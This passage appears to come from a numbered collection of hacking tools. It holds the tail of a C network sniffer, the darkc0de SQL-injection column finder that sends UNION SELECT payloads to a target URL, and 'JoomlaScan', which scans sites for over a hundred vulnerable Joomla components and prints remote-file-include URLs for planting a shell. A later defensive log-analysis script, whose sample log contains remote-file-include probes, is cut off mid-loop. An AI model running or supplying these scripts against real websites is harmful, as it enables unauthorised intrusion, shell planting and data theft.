*)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((ac<argc) && (argv[ac][0] == '-')) { register char ch = argv[ac++][1]; switch(toupper(ch)) { case 'I': device=argv[ac++]; break; case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a"))) Zexit(1,"Output file cant be opened\n"); break; case 'B': backg=1; break; case 'D': debug=1; break; default : fprintf(ERR, "Usage: %s [-b] [-d] [-i interface] [-f file]\n", ProgName); exit(1); } } if(!device) { if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0) Pexit(1,"Eth: socket"); ifc.ifc_len = sizeof(cbuf); ifc.ifc_buf = cbuf; if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0) Pexit(1,"Eth: ioctl"); close(s); device = ifc.ifc_req->ifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" 
Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); }
10.
#!/usr/bin/python
#SQLi column finder
#This script finds the number of columns in a SQLi and a null column!
#thats the short and sweet of it.
#the site must be vuln to SQLi for this to work
#If your sure its vuln to SQLi and its not finding the columns there are 2 possibilities.
#1. only vuln to blind SQLi
#2. it has over 100 columns increase to 200.. (never seen one with more than 200 columns)
# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx
# and the rest of the Darkc0de members

import sys, re, socket, httplib, urllib2

#Maximum Number of Columns this Script will check for!
#Change this if you think column length for target site is greater then 100
colMax = 100

#Add proxy support: Format 127.0.0.1:8080
proxy = "None"

print "\n rsauron:darkc0de.com Column Lenth Finder v1.0"
print "---------------------------------------------------"

if len(sys.argv) != 2:
    print "\n\tUsage: ./colfinder.py <vulnSQLi>"
    print "\n\tEx: ./colfinder.py \"www.site.com/news.php?id=22\"\n"
    sys.exit(1)

siteorig = sys.argv[1]
if siteorig[:7] != "http://":
    siteorig = "http://"+siteorig

try:
    if proxy != "None":
        print "\n[+] Testing Proxy..."
        h2 = httplib.HTTPConnection(proxy)
        h2.connect()
        print "[+] Proxy:",proxy
        print "[+] Building Handler"
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
    else:
        print "\n[-] Proxy Not Given"
        proxy_handler = ""
except(socket.timeout):
    print "\n[-] Proxy Timed Out"
    sys.exit(1)
except(), msg:
    print msg
    print "\n[-] Proxy Failed"
    sys.exit(1)

print "[+] Attempting To find the number of columns..."
checkfor=[]
firstgo = "True"
site = siteorig+"+AND+1=2+UNION+SELECT+"
makepretty = ""

for a in xrange(0,colMax):
    a = str(a)
    darkc0de = "darkcode"+a
    checkfor.append(darkc0de)
    opener = urllib2.build_opener(proxy_handler)
    if firstgo == "True":
        site = site+"0x"+darkc0de.encode("hex")
        firstgo = "False"
    else:
        site = site+",0x"+darkc0de.encode("hex")
    finalurl = site+"--"
    source = opener.open(finalurl).read()
    for b in checkfor:
        colFound = re.findall(b,source)
        if len(colFound) >= 1:
            print "[+] Column Length is:",len(checkfor)
            b = re.findall(("[\d]"),
            print "[+] Found null column at column #:",b[0]
            firstgo = "True"
            for c in xrange(0,len(checkfor)):
                if firstgo == "True":
                    makepretty = makepretty+str(c)
                    firstgo = "False"
                else:
                    makepretty = makepretty+","+str(c)
            print "[+] Site URL:",siteorig+"+AND+1=2+UNION+SELECT+"+makepretty+"--"
            print "[-] Done!\n"
            sys.exit(1)

print "[-] Sorry Column Length could not be found."
print "[-] Try increasing colMax variable. or site is not injectable"
print "[-] Done\n"
11.
#!/usr/bin/env python
import httplib,time,socket
import threading, Queue

class NoResultsPending(Exception):
    """All work requests have been processed."""
    pass

class NoWorkersAvailable(Exception):
    """No worker threads available to process remaining requests."""
    pass

class WorkerThread(threading.Thread):
    """Background thread connected to the requests/results queues.

    A worker thread sits in the background and picks up work requests
    from one queue and puts the results in another until it is dismissed.
    """

    def __init__(self, requestsQueue, resultsQueue, **kwds):
        """Set up thread in daemonic mode and start it immediately.

        requestsQueue and resultQueue are instances of Queue.Queue passed
        by the ThreadPool class when it creates a new worker thread.
        """
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(1)
        self.workRequestQueue = requestsQueue
        self.resultQueue = resultsQueue
        self._dismissed = threading.Event()
        self.start()

    def run(self):
        """Repeatedly process the job queue until told to exit.
        """
        while not self._dismissed.isSet():
            # thread blocks here, if queue empty
            request = self.workRequestQueue.get()
            if self._dismissed.isSet():
                # return the work request we just picked up
                self.workRequestQueue.put(request)
                break # and exit
            # XXX catch exceptions here and stick them to request object
            self.resultQueue.put(
                (request, request.callable(*request.args, **request.kwds))
            )

    def dismiss(self):
        """Sets a flag to tell the thread to exit when done with current job.
        """
        self._dismissed.set()


class WorkRequest:
    """A request to execute a callable for putting in the request queue later.

    See the module function makeRequests() for the common case
    where you want to build several work requests for the same callable
    but different arguments for each call.
    """

    def __init__(self, callable, args=None, kwds=None, requestID=None,
                 callback=None):
        """A work request consists of a callable to be executed by a
        worker thread, a list of positional arguments, a dictionary
        of keyword arguments.

        A callback function can be specified, that is called when the results
        of the request are picked up from the result queue. It must accept
        two arguments, the request object and its results in that order.
        If you want to pass additional information to the callback, just stick
        it on the request object.

        requestID, if given, must be hashable as it is used by the ThreadPool
        class to store the results of that work request in a dictionary.
        It defaults to the return value of id(self).
        """
        if requestID is None:
            self.requestID = id(self)
        else:
            self.requestID = requestID
        self.callback = callback
        self.callable = callable
        self.args = args or []
        self.kwds = kwds or {}


class ThreadPool:
    """A thread pool, distributing work requests and collecting results.

    See the module docstring for more information.
    """

    def __init__(self, num_workers, q_size=0):
        """Set up the thread pool and start num_workers worker threads.

        num_workers is the number of worker threads to start initially.
        If q_size > 0 the size of the work request queue is limited and
        the thread pool blocks when queue is full and it tries to put
        more work requests in it.
        """
        self.requestsQueue = Queue.Queue(q_size)
        self.resultsQueue = Queue.Queue()
        self.workers = []
        self.workRequests = {}
        self.createWorkers(num_workers)

    def createWorkers(self, num_workers):
        """Add num_workers worker threads to the pool."""
        for i in range(num_workers):
            self.workers.append(WorkerThread(self.requestsQueue, self.resultsQueue))

    def dismissWorkers(self, num_workers):
        """Tell num_workers worker threads to quit when they're done."""
        for i in range(min(num_workers, len(self.workers))):
            worker = self.workers.pop()
            worker.dismiss()

    def putRequest(self, request):
        """Put work request into work queue and save for later."""
        self.requestsQueue.put(request)
        self.workRequests[request.requestID] = request

    def poll(self, block=False):
        """Process any new results in the queue."""
        while 1:
            try:
                # still results pending?
                if not self.workRequests:
                    raise NoResultsPending
                # are there still workers to process remaining requests?
                elif block and not self.workers:
                    raise NoWorkersAvailable
                # get back next results
                request, result = self.resultsQueue.get(block=block)
                # and hand them to the callback, if any
                if request.callback:
                    request.callback(request, result)
                del self.workRequests[request.requestID]
            except Queue.Empty:
                break

    def wait(self):
        """Wait for results, blocking until all have arrived."""
        while 1:
            try:
                self.poll(True)
            except NoResultsPending:
                break


def makeRequests(callable, args_list, callback=None):
    """Convenience function for building several work requests for the same
    callable with different arguments for each call.

    args_list contains the parameters for each invocation of callable.
    Each item in 'args_list' should be either a 2-item tuple of the list of
    positional arguments and a dictionary of keyword arguments or a single,
    non-tuple argument.

    callback is called when the results arrive in the result queue.
    """
    requests = []
    # args_list is a list, not a dict, and the tuple test is a plain
    # isinstance() check (the posted version compared item to a bool,
    # so the tuple branch could never be taken).
    for item in args_list:
        if isinstance(item, tuple):
            requests.append(
                WorkRequest(callable, item[0], item[1], callback=callback))
        else:
            requests.append(
                WorkRequest(callable, [item], None, callback=callback))
    return requests


paths = {
    "components/com_flyspray/startdown.php" : "startdown.php?file=shell",
    "administrator/components/com_admin/admin.admin.html.php" : "admin.admin.html.php?mosConfig_absolute_path=shell",
    "components/com_simpleboard/file_upload.php" : "file_upload.php?sbp=shell",
    "components/com_hashcash/server.php" : "server.php?mosConfig_absolute_path=shell",
    "components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php" : "config.inc.php?mosConfig_absolute_path=shell",
    "components/com_sitemap/sitemap.xml.php" : "sitemap.xml.php?mosConfig_absolute_path=shell ",
    "components/com_performs/performs.php" : "performs.php?mosConfig_absolute_path=shell",
    "components/com_forum/download.php" : "download.php?phpbb_root_path=shell",
    "components/com_pccookbook/pccookbook.php" : "pccookbook.php?mosConfig_absolute_path=shell",
    "components/com_extcalendar/extcalendar.php" : "extcalendar.php?mosConfig_absolute_path=shell",
    "components/minibb/index.php" : "index.php?absolute_path=shell",
    "components/com_smf/smf.php" : "smf.php?mosConfig_absolute_path=",
    "modules/mod_calendar.php" : "mod_calendar.php?absolute_path=shell ",
    "components/com_pollxt/conf.pollxt.php" : "conf.pollxt.php?mosConfig_absolute_path=shell ",
    "components/com_loudmounth/includes/abbc/abbc.class.php" : "abbc.class.php?mosConfig_absolute_path=shell",
    "components/com_videodb/core/videodb.class.xml.php" : "videodb.class.xml.php?mosConfig_absolute_path=shell",
    "components/com_pcchess/include.pcchess.php" : "include.pcchess.php?mosConfig_absolute_path=shell",
    "administrator/components/com_multibanners/extadminmenus.class.php" : "extadminmenus.class.php?mosConfig_absolute_path=shell",
    "administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" : "admin.a6mambohelpdesk.php?mosConfig_live_site=shell",
    "administrator/components/com_colophon/admin.colophon.php" : "admin.colophon.php?mosConfig_absolute_path=shell",
    "administrator/components/com_mgm/help.mgm.php" : "help.mgm.php?mosConfig_absolute_path=shell",
    "components/com_mambatstaff/mambatstaff.php" : "mambatstaff.php?mosConfig_absolute_path=shell",
    "components/com_securityimages/configinsert.php" : "configinsert.php?mosConfig_absolute_path=shell",
    "components/com_securityimages/lang.php" : "lang.php?mosConfig_absolute_path=shell",
    "components/com_artlinks/artlinks.dispnew.php" : "artlinks.dispnew.php?mosConfig_absolute_path=shell",
    "components/com_galleria/galleria.html.php" : "galleria.html.php?mosConfig_absolute_path=shell",
    "akocomments.php" : "akocomments.php?mosConfig_absolute_path=shell",
    "administrator/components/com_cropimage/admin.cropcanvas.php" : "admin.cropcanvas.php?cropimagedir=shell",
    "administrator/components/com_kochsuite/config.kochsuite.php" : "config.kochsuite.php?mosConfig_absolute_path=shell",
    "administrator/components/com_comprofiler/plugin.class.php" : "plugin.class.php?mosConfig_absolute_path=shell",
    "components/com_zoom/classes/fs_unix.php" : "fs_unix.php?mosConfig_absolute_path=shell",
    "components/com_zoom/includes/database.php" : "database.php?mosConfig_absolute_path=shell",
    "administrator/components/com_serverstat/install.serverstat.php" : "install.serverstat.php?mosConfig_absolute_path=shell",
    "components/com_fm/fm.install.php" : "fm.install.php?lm_absolute_path=shell",
    "administrator/components/com_mambelfish/mambelfish.class.php" : "mambelfish.class.php?mosConfig_absolute_path=shell",
    "components/com_lmo/lmo.php" : "lmo.php?mosConfig_absolute_path=shell",
    "administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php" : "toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell",
    "components/com_mtree/Savant2/Savant2_Plugin_textarea.php" : "Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jim/install.jim.php" : "install.jim.php?mosConfig_absolute_path=shell",
    "administrator/components/com_webring/admin.webring.docs.php" : "admin.webring.docs.php?component_dir=shell",
    "administrator/components/com_remository/admin.remository.php" : "admin.remository.php?mosConfig_absolute_path=shell",
    "administrator/components/com_babackup/classes/Tar.php" : "Tar.php?mosConfig_absolute_path=shell",
    "administrator/components/com_lurm_constructor/admin.lurm_constructor.php" : "admin.lurm_constructor.php?lm_absolute_path=shell",
    "components/com_mambowiki/MamboLogin.php" : "MamboLogin.php?IP=shell",
    "administrator/components/com_a6mambocredits/admin.a6mambocredits.php" : "admin.a6mambocredits.php?mosConfig_live_site=shell",
    "administrator/components/com_phpshop/toolbar.phpshop.html.php" : "toolbar.phpshop.html.php?mosConfig_absolute_path=shell",
    "components/com_cpg/cpg.php" : "cpg.php?mosConfig_absolute_path=shell",
    "components/com_moodle/moodle.php" : "moodle.php?mosConfig_absolute_path=shell ",
    "components/com_extended_registration/registration_detailed.inc.php" : "registration_detailed.inc.php?mosConfig_absolute_path=shell",
    "components/com_mospray/scripts/admin.php" : "admin.php?basedir=shell",
    "administrator/components/com_bayesiannaivefilter/lang.php" : "lang.php?mosConfig_absolute_path=shell",
    "administrator/components/com_uhp/uhp_config.php" : "uhp_config.php?mosConfig_absolute_path=shell",
    "administrator/components/com_peoplebook/param.peoplebook.php" : "param.peoplebook.php?mosConfig_absolute_path=shell",
    "administrator/components/com_mmp/help.mmp.php" : "help.mmp.php?mosConfig_absolute_path=shell",
    "components/com_reporter/processor/reporter.sql.php" : "reporter.sql.php?mosConfig_absolute_path=shell",
    "components/com_madeira/img.php" : "img.php?url=shell",
    "components/com_jd-wiki/lib/tpl/default/main.php" : "main.php?mosConfig_absolute_path=shell",
    "components/com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
    "com_bsq_sitestats/external/rssfeed.php" : "rssfeed.php?baseDir=shell",
    "components/com_slideshow/admin.slideshow1.php" : "admin.slideshow1.php?mosConfig_live_site=shell",
    "administrator/components/com_panoramic/admin.panoramic.php" : "admin.panoramic.php?mosConfig_live_site=shell",
    "administrator/components/com_mosmedia/includes/credits.html.php" : "credits.html.php?mosConfig_absolute_path=shell",
    "administrator/components/com_mosmedia/includes/info.html.php" : "info.html.php?mosConfig_absolute_path=shell",
    "administrator/components/com_mosmedia/includes/media.divs.php" : "media.divs.php?mosConfig_absolute_path=shell",
    "administrator/components/com_mosmedia/includes/media.divs.js.php" : "media.divs.js.php?mosConfig_absolute_path=shell",
    "administrator/components/com_mosmedia/includes/purchase.html.php" : "purchase.html.php?mosConfig_absolute_path=shell",
    "administrator/components/com_mosmedia/includes/support.html.php" : "support.html.php?mosConfig_absolute_path=shell",
    "administrator/components/com_wmtportfolio/admin.wmtportfolio.php" : "admin.wmtportfolio.php?mosConfig_absolute_path=shell",
    "components/com_mp3_allopass/allopass.php" : "components/com_mp3_allopass/allopass.php?mosConfig_live_site=shell",
    "components/com_mp3_allopass/allopass-error.php" : "components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=shell",
    "administrator/components/com_jcs/jcs.function.php" : "administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jcs/view/add.php" : "administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jcs/view/history.php" : "administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jcs/view/register.php" : "administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jcs/views/list.sub.html.php" : "administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jcs/views/list.user.sub.html.php" : "administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jcs/views/reports.html.php" : "administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=shell",
    "com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
    "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php" : "com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
    "administrator/components/com_jjgallery/admin.jjgallery.php" : "administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=shell",
    "administrator/components/com_juser/xajax_functions.php" : "administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=shell",
    "components/com_jreviews/scripts/xajax.inc.php" : "components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=shell",
    "com_directory/modules/mod_pxt_latest.php" : "com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php" : "administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell",
    "administrator/components/com_chronocontact/excelwriter/PPS/File.php" : "administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=shell",
    "administrator/components/com_chronocontact/excelwriter/Writer.php" : "administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=shell",
    "administrator/components/com_chronocontact/excelwriter/PPS.php" : "administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=shell",
    "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php" : "administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=shell",
    "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=shell",
    "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=shell",
    "administrator/components/com_chronocontact/excelwriter/Writer/Format.php" : "administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=shell",
    "index.php?option=com_custompages" : "index.php?option=com_custompages&cpage=shell",
    "component/com_onlineflashquiz/quiz/common/db_config.inc.php" : "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=shell",
    "administrator/components/com_joomla-visites/core/include/myMailer.class.php" : "administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=shell",
    "index.php?option=com_facileforms" : "components/com_facileforms/facileforms.frame.php?ff_compath=shell",
    "administrator/components/com_rssreader/admin.rssreader.php" : "administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=shell",
    "administrator/components/com_feederator/includes/tmsp/add_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=shell",
    "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php" : "administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=shell",
    "administrator/components/com_feederator/includes/tmsp/subscription.php" : "administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_feederator/includes/tmsp/tmsp.php" : "administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=shell",
    "administrator/components/com_clickheat/install.clickheat.php" : "administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_clickheat/includes/heatmap/_main.php" : "administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=shell",
    "administrator/components/com_clickheat/includes/heatmap/main.php" : "administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=shell",
    "administrator/components/com_clickheat/includes/overview/main.php" : "administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=shell",
    "administrator/components/com_clickheat/Recly/Clickheat/Cache.php" : "administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php" : "administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_clickheat/Recly/common/GlobalVariables.php" : "administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_competitions/includes/competitions/add.php" : "administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_competitions/includes/competitions/competitions.php" : "administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=shell",
    "administrator/components/com_competitions/includes/settings/settings.php" : "administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=shell",
    "administrator/components/com_dadamail/config.dadamail.php" : "administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=shell",
    "administrator/components/com_googlebase/admin.googlebase.php" : "administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=shell",
    "administrator/components/com_ongumatimesheet20/lib/onguma.class.php" : "administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=shell",
    "administrator/components/com_treeg/admin.treeg.php" : "administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=shell"}


def usage():
    print """\tUsage: ./joomlascan.py <site> <options>
\t[options]
\t -p/--proxy <host:port> : Add proxy support
\t -e/--errors : Show Error responses
\t -j : path to joomla if needed

Ex: ./joomlascan.py www.test.com -404 -p 127.0.0.1:8080
"""
    sys.exit(1)

def testproxy(proxy):
    try:
        httplib.HTTPConnection(proxy).connect()
    except:
        print "Proxy broke! Reverting to Direct Connect Ctrl-C Now if this scares you!"
        time.sleep(3)
        globals()['proxy']=''

def testhost(host):
    try:
        httplib.HTTPConnection(host).connect()
    except:
        print "Host down, or you're an idiot! Either way, I'm out of here!"
        sys.exit(1)

def runattack(apath,shell):
    proxy=globals()['proxy']
    host=globals()['host']
    path=globals()['joomlapath']
    p404=globals()['p404']
    #print "Apath:",apath,"- Shell:",shell
    if proxy:
        h=httplib.HTTP(proxy)
        h.putrequest("GET", "http://"+host+"/"+path+"/"+apath)
    else:
        h=httplib.HTTP(host)
        h.putrequest("HEAD", "/"+path+"/"+apath)
    h.putheader("Host", host)
    h.endheaders()
    try:
        status, reason, headers = h.getreply()
        if status==200:
            print 'Found: '+apath+': Use Shell: '+shell
        elif p404:
            print 'Not Found:',apath,status,reason
    except(), msg:
        print "Error Occurred:",msg
        pass

if __name__=="__main__":
    import getopt,sys
    print "\n\tJoomlaScan++ - Now Not As Ghey!"
    print "\t--------------------------------------------"
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hep:j:", ["help", "output="])
    except getopt.GetoptError, err:
        usage()
    socket.setdefaulttimeout(6)
    p404=False
    proxy=''
    host=''
    joomlapath=''
    for o, a in opts:
        if o == "-v":
            verbose = True
        elif o in ("-h", "--help"):
            usage()
        elif o in ("-p", "--proxy"):
            proxy=a
        elif o in ("-e","--errors"):
            p404=True
        elif o in ("-j","--joomlapath"):
            joomlapath=a
        else:
            usage()
    if args:
        host=args[0]
    else:
        usage()
    if proxy:
        testproxy(proxy)
    testhost(host)
    attackpool=ThreadPool(20)
    for item in paths.items():
        attackpool.putRequest(WorkRequest(runattack,item))
    print "Main thread working..."
    while 1:
        try:
            attackpool.poll()
            time.sleep(0.5)
        except (KeyboardInterrupt):
            print "User Break... Exiting..."
            break
        except (NoResultsPending):
            print "Scan Finished: Exiting."
            break
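Seen from the web server, the two darkc0de scripts above leave distinctive traces: the column finder sends one request per candidate column count, each a UNION SELECT whose columns are long hex literals, and JoomlaScan walks a fixed table of component paths (mostly answered 404) and, for anything that answers 200, reports a URL that sets a path-configuration parameter such as mosConfig_absolute_path. The Python 3 code below, added here as an example and not part of either post, flags those patterns in combined-format access logs. The log lines, client addresses, the sweep threshold and the function names are constructed for this example; only the parameter names are taken from the path table in the post.

```python
#!/usr/bin/env python3
"""Flag scanner traffic of the kind the two darkc0de scripts above generate.

Added example for this page; constructed log lines and addresses, not output
of either tool.  Parameter names are copied from JoomlaScan's path table.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" access-log line (client, timestamp, request, status, size).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Configuration parameters that JoomlaScan's path table sets to "shell".  A request
# that sets one of them to a remote URL is a remote-file-include probe, never normal use.
RFI_PARAMS = {
    "mosConfig_absolute_path", "mosConfig_live_site", "absolute_path",
    "lm_absolute_path", "phpbb_root_path", "base_dir", "basedir", "baseDir",
    "component_dir", "cropimagedir", "ff_compath", "sbp", "cpage",
}

# The column finder appends "UNION SELECT 0x..,0x..,.." with one hex literal per column.
UNION_RE = re.compile(r"\bunion\b.{0,20}\bselect\b", re.I)
HEX_LITERAL_RE = re.compile(r"\b0x[0-9a-f]{8,}\b", re.I)
COMPONENT_PATH_RE = re.compile(r"/(administrator/)?components/com_")
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qsl(parts.query, keep_blank_values=True)  # decodes %xx and '+'
    return rec


def normalize_param(name):
    """Map GLOBALS[x] / GLOBALS['x'] (register_globals-style overrides) to x."""
    m = re.fullmatch(r"GLOBALS\[\s*['\"]?([^'\"\]]+)['\"]?\s*\]", name)
    return m.group(1) if m else name


def classify(rec):
    """Return detection tags for a single parsed request."""
    tags = []
    decoded = unquote_plus(rec["target"])
    if UNION_RE.search(decoded):
        hexes = HEX_LITERAL_RE.findall(decoded)
        tags.append(f"union-select-probe:{len(hexes)}-hex-literals")
    for name, value in rec["query"]:
        base = normalize_param(name)
        if base in RFI_PARAMS and REMOTE_URL_RE.match(value):
            tags.append(f"rfi-probe:{base}")
    return tags


def analyze(lines, sweep_threshold=5):
    """Run the per-request checks plus a per-client sweep check over a log.

    Returns (client_ip, evidence, tag) triples.  The sweep check counts distinct
    Joomla component paths a client requested and got 404 for, which is how a
    path-table scan like JoomlaScan looks from the server side.
    """
    findings = []
    component_misses = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for tag in classify(rec):
            findings.append((rec["ip"], rec["target"], tag))
        if rec["status"] == "404" and COMPONENT_PATH_RE.search(rec["path"]):
            component_misses[rec["ip"]].add(rec["path"])
    for ip, paths in component_misses.items():
        if len(paths) >= sweep_threshold:
            findings.append((ip, f"{len(paths)} distinct component paths 404", "component-sweep"))
    return findings


# Constructed sample log: a column probe, a component sweep that ends in RFI probes,
# and one ordinary request that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2009:12:00:01 +0000] "GET /news.php?id=22+AND+1=2+UNION+SELECT+0x6461726b636f646530,0x6461726b636f646531,0x6461726b636f646532-- HTTP/1.1" 200 5123
203.0.113.7 - - [10/Sep/2009:12:00:02 +0000] "GET /news.php?id=22 HTTP/1.1" 200 5120
198.51.100.4 - - [10/Sep/2009:12:05:00 +0000] "HEAD /components/com_flyspray/startdown.php HTTP/1.0" 404 -
198.51.100.4 - - [10/Sep/2009:12:05:00 +0000] "HEAD /components/com_simpleboard/file_upload.php HTTP/1.0" 404 -
198.51.100.4 - - [10/Sep/2009:12:05:00 +0000] "HEAD /components/com_hashcash/server.php HTTP/1.0" 404 -
198.51.100.4 - - [10/Sep/2009:12:05:01 +0000] "HEAD /administrator/components/com_admin/admin.admin.html.php HTTP/1.0" 404 -
198.51.100.4 - - [10/Sep/2009:12:05:01 +0000] "HEAD /components/com_forum/download.php HTTP/1.0" 404 -
198.51.100.4 - - [10/Sep/2009:12:05:02 +0000] "HEAD /components/com_smf/smf.php HTTP/1.0" 200 -
198.51.100.4 - - [10/Sep/2009:12:06:00 +0000] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://203.0.113.9/x.txt? HTTP/1.0" 200 812
198.51.100.4 - - [10/Sep/2009:12:06:01 +0000] "GET /administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://203.0.113.9/x.txt HTTP/1.0" 404 -
192.0.2.10 - - [10/Sep/2009:12:07:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9001
"""

if __name__ == "__main__":
    for ip, evidence, tag in analyze(SAMPLE_LOG.splitlines()):
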